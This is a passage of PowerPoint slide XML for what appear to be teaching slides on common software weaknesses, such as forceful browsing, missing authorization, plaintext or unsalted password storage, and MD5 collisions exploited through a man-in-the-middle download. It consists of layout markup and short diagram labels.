              <a:endCxn id="73" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1" rot="5400000">
              <a:off x="1992960" y="1752120"/>
              <a:ext cx="1279080" cy="1518120"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -13429"/>
                <a:gd name="adj2" fmla="val 41816"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="70ad47">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="85" name="Curved Connector 29"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="77" idx="0"/>
              <a:endCxn id="76" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1" rot="16200000">
              <a:off x="3601080" y="3373920"/>
              <a:ext cx="473760" cy="4320"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 24942"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="c00000"/>
              </a:solidFill>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="TextBox 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3836160" y="3032640"/>
              <a:ext cx="1043280" cy="1186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Forceful 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Browsing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Reliance on Untrusted Inputs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88" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2706120" y="1515240"/>
            <a:ext cx="2540880" cy="3506400"/>
            <a:chOff x="2706120" y="1515240"/>
            <a:chExt cx="2540880" cy="3506400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="89" name="Picture 3" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2934000" y="1515240"/>
              <a:ext cx="718200" cy="925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0" name="TextBox 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2706120" y="2387880"/>
              <a:ext cx="13532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/restricted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91" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2906640" y="3719520"/>
              <a:ext cx="952200" cy="95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" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2838960" y="4657680"/>
              <a:ext cx="11368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Attacker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93" name="Curved Connector 7"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="91" idx="0"/>
              <a:endCxn id="90" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2898720" y="3235680"/>
              <a:ext cx="968040" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="c00000"/>
              </a:solidFill>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Oval Callout 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3609720" y="3115440"/>
              <a:ext cx="1481760" cy="750600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -45278"/>
                <a:gd name="adj2" fmla="val 57632"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="9000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="4472c4">
                  <a:shade val="50000"/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I'm admin ;)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" name="Oval Callout 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3765240" y="1515240"/>
              <a:ext cx="1481760" cy="750600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -60069"/>
                <a:gd name="adj2" fmla="val 30113"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="9000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="4472c4">
                  <a:shade val="50000"/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Hello admin!</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US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25840" y="423720"/>
            <a:ext cx="10515240" cy="54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Missing/Incorrect Authorization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7" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078520" y="1260720"/>
            <a:ext cx="718200" cy="92592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6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039760" y="1337760"/>
            <a:ext cx="718200" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998720" y="2143800"/>
            <a:ext cx="815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Box 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950720" y="2187720"/>
            <a:ext cx="973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/admin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Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1922760" y="3688200"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826640" y="4640400"/>
            <a:ext cx="1136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3" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="101" idx="0"/>
            <a:endCxn id="99" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1811880" y="3094200"/>
            <a:ext cx="1180800" cy="7920"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24977"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="104" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="99" idx="2"/>
            <a:endCxn id="105" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="2570760" y="1597320"/>
            <a:ext cx="746280" cy="1075320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -24517"/>
              <a:gd name="adj2" fmla="val 47856"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="70ad47">
                <a:lumMod val="75000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="106" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="107" idx="2"/>
            <a:endCxn id="97" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="4085640" y="1528560"/>
            <a:ext cx="798120" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22788"/>
              <a:gd name="adj2" fmla="val 50545"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4264560" y="2673720"/>
            <a:ext cx="12250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Forceful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Browsing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Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="80444" t="2193" r="2458" b="66608"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3481200" y="1298880"/>
            <a:ext cx="718200" cy="925920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3367080" y="2157480"/>
            <a:ext cx="1046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/limited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54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Missing Encryption of Sensitive Data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1" name="Picture 6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1507320" y="1431720"/>
            <a:ext cx="718200" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466280" y="2237760"/>
            <a:ext cx="815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3" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390320" y="4101480"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523160" y="5104440"/>
            <a:ext cx="700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5" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="113" idx="0"/>
            <a:endCxn id="112" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1119960" y="3348000"/>
            <a:ext cx="1500120" cy="7920"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25012"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="116" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="111" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225520" y="1868040"/>
            <a:ext cx="1623240" cy="739080"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33318"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="70ad47">
                <a:lumMod val="75000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Oval Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2144160" y="3656160"/>
            <a:ext cx="2546280" cy="853200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="9000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4472c4">
                <a:shade val="50000"/>
                <a:alpha val="3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user: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>eve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pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>ABCDEFG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Can 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576240" y="1196280"/>
            <a:ext cx="2968200" cy="2304720"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="18000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4472c4">
                <a:shade val="50000"/>
                <a:alpha val="2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9" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4390560" y="1301760"/>
            <a:ext cx="1270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Database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20" name="Table 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3848760" y="1959120"/>
          <a:ext cx="2423520" cy="1279800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="576000"/>
                <a:gridCol w="839160"/>
                <a:gridCol w="1008000"/>
              </a:tblGrid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id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username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password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5163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5164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eve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c00000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ABCDEFG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5165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pic>
        <p:nvPicPr>
          <p:cNvPr id="121" name="Graphic 23" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6025680" y="4129560"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5918760" y="5093280"/>
            <a:ext cx="1136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3" name="Curved Connector 28"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="121" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="5573880" y="3201840"/>
            <a:ext cx="1523160" cy="333000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16146"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="TextBox 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5094000" y="3634920"/>
            <a:ext cx="1583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Data breach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Curved Connector 37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="126" idx="1"/>
            <a:endCxn id="127" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="2116080" y="2232000"/>
            <a:ext cx="2008440" cy="2939400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="123825">
            <a:solidFill>
              <a:srgbClr val="e7e6e6">
                <a:lumMod val="50000"/>
                <a:alpha val="31000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp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51040" y="2858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Use of a Broken Crypto Algorithm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Cube 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1204560" y="1675440"/>
            <a:ext cx="870120" cy="1330200"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25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6" name="Cube 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253680" y="1675440"/>
            <a:ext cx="870120" cy="1330200"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25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30" name="Picture 5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4798080" y="2013840"/>
            <a:ext cx="718200" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Graphic 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="4695120"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289520" y="5654160"/>
            <a:ext cx="700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3" name="Curved Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="134" idx="2"/>
            <a:endCxn id="131" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1012680" y="4067640"/>
            <a:ext cx="1254960" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="70ad47">
                <a:lumMod val="75000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747000" y="3076560"/>
            <a:ext cx="1785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Secure Server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Box 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481040" y="3952080"/>
            <a:ext cx="2349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Expected File Hash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MD5,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1234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Box 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4047120" y="2795760"/>
            <a:ext cx="3169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MD5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(Expected File)=1234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Graphic 17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5397480" y="3595320"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="TextBox 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298760" y="4329360"/>
            <a:ext cx="10983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MD5 Collision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Picture 19" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555720" y="4478400"/>
            <a:ext cx="718200" cy="925920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2601000" y="5299560"/>
            <a:ext cx="2605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</a:rPr>
              <a:t>MD5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(Malware)=1234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Box 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589840" y="3142080"/>
            <a:ext cx="2214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Download Server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(Not Secure)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TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6108840" y="3351960"/>
            <a:ext cx="955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Man-in-the-middle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Picture 46" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605760" y="4478400"/>
            <a:ext cx="718200" cy="87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016800" y="336240"/>
            <a:ext cx="10515240" cy="54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Unsalted Hash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5" name="Picture 6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947880" y="1443240"/>
            <a:ext cx="718200" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906840" y="2249280"/>
            <a:ext cx="815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Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838080" y="4182840"/>
            <a:ext cx="952200" cy="9522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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956880" y="5104080"/>
            <a:ext cx="700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User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9" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="147" idx="0"/>
            <a:endCxn id="146" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="529200" y="3398040"/>
            <a:ext cx="1569960" cy="720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="150" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="145" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666080" y="1879560"/>
            <a:ext cx="1638720" cy="843480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33267"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="70ad47">
                <a:lumMod val="75000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Oval Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585080" y="3667680"/>
            <a:ext cx="2546280" cy="853200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="9000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4472c4">
                <a:shade val="50000"/>
                <a:alpha val="3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user: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>eve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pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>ABCDEFG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Can 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016800" y="1207800"/>
            <a:ext cx="2968200" cy="2304720"/>
          </a:xfrm>
          <a:prstGeom prst="can">
